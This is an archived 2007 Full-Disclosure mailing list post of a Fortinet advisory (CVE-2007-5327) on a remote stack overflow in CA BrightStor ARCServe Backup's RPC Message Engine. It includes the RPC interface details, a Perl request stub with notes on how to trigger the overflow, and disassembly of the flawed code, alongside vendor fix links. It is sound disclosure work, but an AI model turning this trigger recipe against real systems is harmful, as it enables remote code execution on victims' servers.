Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] CA BrightStor ARCServe BackUp Message Engine Remote St

from [hfli] Network Security [Permanent Link]
Subject: [Full-disclosure] CA BrightStor ARCServe BackUp Message Engine Remote Stack Overflow Vulnerability
Date: Thu, 11 Oct 2007 15:29:43 +0800 
hi full-disclosure,


CA BrightStor ARCServe BackUp Message Engine Remote Stack Overflow Vulnerability

by cocoruder of Fortinet Security Research Team
http://ruder.cdut.net


Summary:

    A remote stack overflow vulnerability exist in the RPC interface of CA 
BrightStor ARCServe BackUp. An arbitrary anonymous attacker can execute 
arbitrary code on the affected system by exploiting this vulnerability.


Affected Software Versions:

    CA BrightStor ARCServe BackUp R11.5



Details::
        
    The flaw specifically exits within the CA BrightStor Message Engine due to 
incorrect handling of RPC requests on TCP port 6504. The interface is 
identified by 506b1890-14c8-11d1-bbc3-00805fa6962e v1.0. Opnum 0x10d specifies 
the vulnerable operation within this interface.

    Function 0x10d's IDL as follows:

        long   sub_28EA5F70 (
         [in] handle_t  arg_1,
         [in, out][size_is(256), length_is(1)] struct struct_2 * arg_2,
         [in][string] char * arg_3,
         [in][string] char * arg_4,
         [in][string] char * arg_5,
         [in][string] char * arg_6,
         [in][string] char * arg_7,
         [in] long  arg_8,
         [out][size_is(arg_1)] byte * arg_9
        );

    The following is the normal stub of this function:

        my $stub=
        "\x00\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".

        "\x10\x00\x00\x00\x00\x00\x00\x00".                     #point1: the 
victim's computer name
        "\x10\x00\x00\x00".
        "kkk-49ade5b31c1".
        "\x00".
        
        "\x09\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00".     #point2: a 
string,set it long
        "Database".
        "\x00\x00\x00\x00".

        "\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
        "\x00\x00\x00\x00".
        
        "\x1a\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00".     
        "RemoteDatabaseMachineName".
        "\x00\x00\x00".
                
        "\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
        "\x00\x79\x49\x6e\x40\x00\x00\x00";


    When we set #point1 equal to the victim's computer name, and set #point2 is 
a long string, there will cause a stack base overflow vulnerability. The 
vulnerable code as follows: 
        
        .text:25604EF8                 lea     edx, [esp+120h+SubKey]
        .text:25604EFC                 push    offset asc_2561E2BC      
        .text:25604F01                 push    edx                      ;
        .text:25604F02                 call    edi ; lstrcatA           ; 
        .text:25604F04                 lea     eax, [esp+120h+SubKey]
        .text:25604F08                 push    esi                      ;
        .text:25604F09                 push    eax                      
        .text:25604F0A                 call    edi ; lstrcatA           ; 
overflow!



Solution:

    CA has released an advisory for this vulnerability which is available on:

    http://supportconnectw.ca.com/public/storage/infodocs/basb-secnotice.asp

    Fortinet advisory can be found at:
    
    http://www.fortiguardcenter.com



CVE Information:

    CVE-2007-5327


Disclosure Timeline:

    2007.04.11        Vendor notified via email 
    2007.04.12        Vendor responded
    2007.10.11        Final public disclosure



Disclaimer:

    Although Fortinet has attempted to provide accurate information in
these materials, Fortinet assumes no legal responsibility for the
accuracy or completeness of the information. More specific information
is available on request from Fortinet. Please note that Fortinet's
product information does not constitute or contain any guarantee,
warranty or legally binding representation, unless expressly
identified as such in a duly signed writing.


Fortinet Security Research
secresearch@fortinet.com
http://www.fortinet.com


        

Best Regards,
                                

        Haifei Li
        hfli@fortinet.com
          2007-10-11

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] CA BrightStor ARCServe BackUp Message Engine Remote Stack Overflow Vulnerability, hfli <=
Previous by Date:  [Full-disclosure] CORE-2007-0928: Stack-based buffer overflow vulnerability in OpenBSDâs DHCP server, Core Security Technologies Advisories
Next by Date:  [Full-disclosure] iDefense Security Advisory 10.11.07: Multiple Vendor FLAC Library Multiple Integer Overflow Vulnerabilities, iDefense Labs
Previous by Thread:  [Full-disclosure] CORE-2007-0928: Stack-based buffer overflow vulnerability in OpenBSDâs DHCP server, Core Security Technologies Advisories
Next by Thread:  [Full-disclosure] iDefense Security Advisory 10.11.07: Multiple Vendor FLAC Library Multiple Integer Overflow Vulnerabilities, iDefense Labs
Indexes:  [Date] [Thread] [Top] [All Lists]